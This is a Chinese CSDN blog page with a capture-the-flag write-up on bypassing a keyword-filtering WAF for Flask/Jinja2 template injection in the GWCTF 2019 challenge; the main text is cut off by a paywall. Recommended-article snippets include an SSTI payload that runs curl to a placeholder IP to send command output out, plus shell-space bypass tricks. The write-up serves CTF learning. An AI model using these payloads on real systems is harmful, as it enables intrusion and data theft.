[GWCTF 2019]你的名字 - SSTI注入(waf绕过)

最新推荐文章于 2024-11-26 01:46:11 发布
最新推荐文章于 2024-11-26 01:46:11 发布
阅读量385 收藏
点赞数
文章标签: web安全 安全 ctf SSTI flask python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/oZuoShen123/article/details/133737289
版权
博客分析了一道GWCTF 2019中的SSTI(Server-Side Template Injection)注入问题。作者详细介绍了解题流程,包括页面输入分析、过滤关键字的识别以及如何通过{%print%}、关键字形式绕过WAF过滤。在解题过程中,重点讲述了如何利用两层过滤机制构造payload,最终发现flag存在于env中。博客总结了从class到env变量获取过程中的关键点和Python 2.7.18版本的特殊性。
摘要由CSDN通过智能技术生成

[GWCTF 2019]你的名字

在这里插入图片描述

1 解题流程

1.1 分析

1、页面只有一个输入框,输入什么回显什么
2、根据特性应该是SSTI注入

1.2 解题

  1. fuzz:过滤则长度1512
    过滤:{ {}}、class、mro、builtins、file、func_globals、import、args、eval、for、if、config、popen(将open过滤)
    绕过:{ {}}用{%print%}、关键字要么用attr(‘cla’'ss’)|attr(‘base’)形式绕过、要么用['__clas'+'s__']形式绕过、要么用clconfigass形式绕过
    这里简单讲一下为什么最后的形式是claconfigss,因为waf是将关键字置空,但是这道题大概率的两层过滤,第一层先过滤class,第二层再过滤config,所以导致claconfigss绕过第一层后,第二层将config置空变成cla
了解本专栏 订阅专栏 解锁全文 超级会员免费看
Hillain
关注
专栏目录
订阅专栏
BUUCTF:[GWCTF 2019]你的名字 --- ssti -- bypass 学习
Zero_Adam的博客
04-22 1693
一、自己做: 抓包没啥,除非要扫目录, 啊,,就是直接返回的逻辑,,xss也是直接返回,也就说明有某些机制了,然后想去闭合一些标签,但是都没成功,</div>,</h1>,这些, 感觉没思路了,,扫扫目录把。 别了,想到了ssti,试了一下:{{2*2}},报错了 Parse error: syntax error, unexpected T_STRING, expecting '{' in \var\WWW\html\test.php on line 13 而且,还不能处理中文
BUUCTF-模板注入专项刷题
m0_51563147的博客
02-27 3474
SSTI: 目录 简单 [CSCCTF 2019 Qual]FlaskLight 签到 [BJDCTF2020]Cookie is so stable twig模板注入 [WesternCTF2018]shrine 想方设法获取config [CISCN2019 华东南赛区]Web11 smarty模板注入 [BJDCTF2020]The mystery of ip [GYCTF2020]FlaskApp debug模式一定条件下可以窃取出来pin码命令执行,但是题目过滤的不够严格导致.
[GWCTF 2019]你的名字
qq_43801002的博客
07-28 1397
题目 过程 1.在 ssti 中过滤了后, 可以通过{%外带 {% if ''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('curl http://xx.xxx.xx.xx:8080/?i=ls /') %}1{% endif %} 由于有黑名单,这里使用得操作是利用blacklist里面最后一个进行绕过。 只要在其他语句加入他,那么就可以绕过其他语句了。 但是不知道他得blackl
buu刷题(4)
qq_62046696的博客
03-22 590
题目中只限制了 F I L E S [ f i l e ] ∗ ∗ 的上传后缀,也只给出 ∗ ∗ _FILES[file]** 的上传后缀,也只给出 ** FILES[file]∗∗的上传后缀,也只给出∗∗_FILES[file] 上传后的路径,那我们上传多文件就可以绕过。人傻了,上面的思路全部错掉,上面输入的filename文件,其实是没有权限执行php代码的,这点我们可以通过phpinfo();所以我们的恶意代码先执行。也是通过报错推断出过滤了{{而没用过滤{,这里我用的是{%3*3%}发现回显的是,
GXYCTF2019&GWCTF2019——Writeup
Lethe's Blog
03-03 3372
GXYCTF Ping Ping Ping 进入题目后,提示了 /?ip=,于是加上参数 ?ip=1试试看,发现是执行了ping命令: 然后尝试: ?ip=;ls 发现成功执行了命令,但是当读取 flag.php 时,发现过了空格,尝试下面两种绕过方式 ${IFS} $IFS$9 使用第二个$IFS$9代替空格成功绕过,执行 ?ip=;cat$IFS$9flag.php,发现 flag...
web安全-SSTI模板注入漏洞
weixin_61956136的博客
07-31 3795
web安全-SSTI模板注入漏洞
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记(1)
2401_84009626的博客
04-20 838
可以编码绕过 python解析器支持 hex ,unicode编码 (不建议用base64仅python2支持)建议用nssctf在线 https://www.nssctf.cn/problem/13 直接用。完全可以替换为 request.args.参数名(get方式)用[] 代替 . 其他方法 参考 获取属性的四种方法。尝试写静态文件 请先了解 flask 静态目录概念。以下题目我用简洁的payload 绕过。{{}} 等价于 {%print%}通过过滤器 | join 返回变量。通过 |attr()
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记
2401_84009698的博客
04-20 1040
外链图片转存中…(img-6fV9ce6x-1713552193682)]
buu Crypto学习记录(7) password
EMsheep的博客
11-27 560
题目链接:https://buuoj.cn/challenges#password 姓名:张三 生日:19900315 key格式为key{xxxxxxxxxx} flag:zs19900315
re学习笔记(39)BUUCTF-re-[GWCTF 2019]xxor
逆向随笔
02-20 1732
新手一枚,如有错误(不足)请指正,谢谢!! 个人博客:点击进入 题目链接:[GWCTF 2019]xxor xorm[0] = 3746099070, xorm[1] = 550153460, xorm[2] = 3774025685, xorm[3] = 1548802262, xorm[4] = 2652626477, xorm[5] = 2230518816 ...
【网络安全设备系列】4、漏洞扫描设备
Hacker_LaoYi的博客
11-23 440
1、定期的网络安全自我检测、评估 安全检测可帮助客户最大可能的消除安全隐患,尽可能早地发现安全漏洞并进行修补,有效的利用已有系统,提高网络的运行效率。5、重大网络安全事件前的准备 重大网络安全事件前网络漏洞扫描/网络评估系统能够帮助用户及时的找出网络中存在的隐患和漏洞,帮助用户及时的弥补漏洞。漏洞扫描是指基于漏洞数据库,通过扫描等手段对指定的远程或者本地计算机系统的安全脆弱性进行检测,发现可利用的漏洞的一种安全检测(渗透攻击)行为。4. 漏洞检测数据采集技术: 按照网络、系统、数据库进行扫描。
2025职业院校技能大赛信息安全管理与评估(河北省) 任务书
Aluxian_的博客
11-22 1007
2025职业院校技能大赛信息安全管理与评估(河北省) 任务书培训环境
【网络安全设备系列】3、IPS(入侵防御系统)
Hacker_Oldv的博客
11-22 1098
IDS和IPS的关系,并非取代和互斥,而是相互协作:没有部署IDS的时候,只能是凭感觉判断,应该在什么地方部署什么样的安全产品,通过IDS的广泛部署,了解了网络的当前实时状况,据此状况可进一步判断应该在何处部署何类安全产品(IPS等)。入侵检测系统(IDS)对那些异常的、可能是入侵行为的数据进行检测和报警,告知使用者网络中的实时状况,并提供相应的解决、处理方法,是一种侧重于风险管理的安全产品。2、旁路部署的IDS可以及时发现那些穿透防火墙的深层攻击行为,作为防火墙的有益补充,但很可惜的是无法实时的阻断。
网络安全在数字时代保护库存数据中的作用
最新发布
网络研究观
11-26 421
网络安全对于保护数字时代的库存数据至关重要。
网络安全防范体系及设计原则
2401_88750741的博客
11-25 293
网络安全防范体系的科学性、可行性是其可顺利实施的保障。该层次的安全包括通信线路的安全,物理设备的安全,机房的安全等。作为全方位的、整体的网络安全防范体系也是分层次的,不同层次反映了不同的安全问题,根据网络的应用现状情况和网络的结构,我们将安全防范体系的层次划分为物理层安全、系统层安全、网络层安全、应用层安全安全管理。该层次的安全问题主要体现在网络方面的安全性,包括网络层身份认证,网络资源的访问控制,数据传输的保密与完整性,远程接入的安全,域名系统的安全,路由系统的安全,入侵检测的手段,网络设施防病毒等。
网络安全审计机制与实现技术
山兔的博客
11-23 703
只有这个进入的接口不转发,其它所有的接口都可以转发,如果你这边用的是集线器,他就是一个共享的网络,也就是它的任意接口接一个设备就可以监听到其它所有接口发送或者接收的流量,这个就是共享网络,集线器现在已经被淘汰了,所以没有共享网络。交换机有专用的信息交换通道,要在交换机端口上接一个流量采集设备,我们要在交换机上去配置端口镜像,把交换机其它端口上的流量镜像一份,扔给采集设备,端口镜像在实际的项目当中应用的最多。2.审计数据强制访问。技术分类:基于主机的审计机制、基于网络通信的审计机制、基于应用的审计机制等。
网络安全,文明上网(6)网安相关法律
m0_73399576的博客
11-22 429
网络安全,文明上网——网安相关法律篇
ssti模板注入payload
09-26
SSTI(服务器端模板注入)是指攻击者能够将恶意有效载荷注入到服务器端模板中,然后在服务器端执行该模板。攻击者利用模板引擎生成前端的HTML代码,通过将用户的数据放到渲染函数中来生成模板,最终将生成的HTML页面...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hillain

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值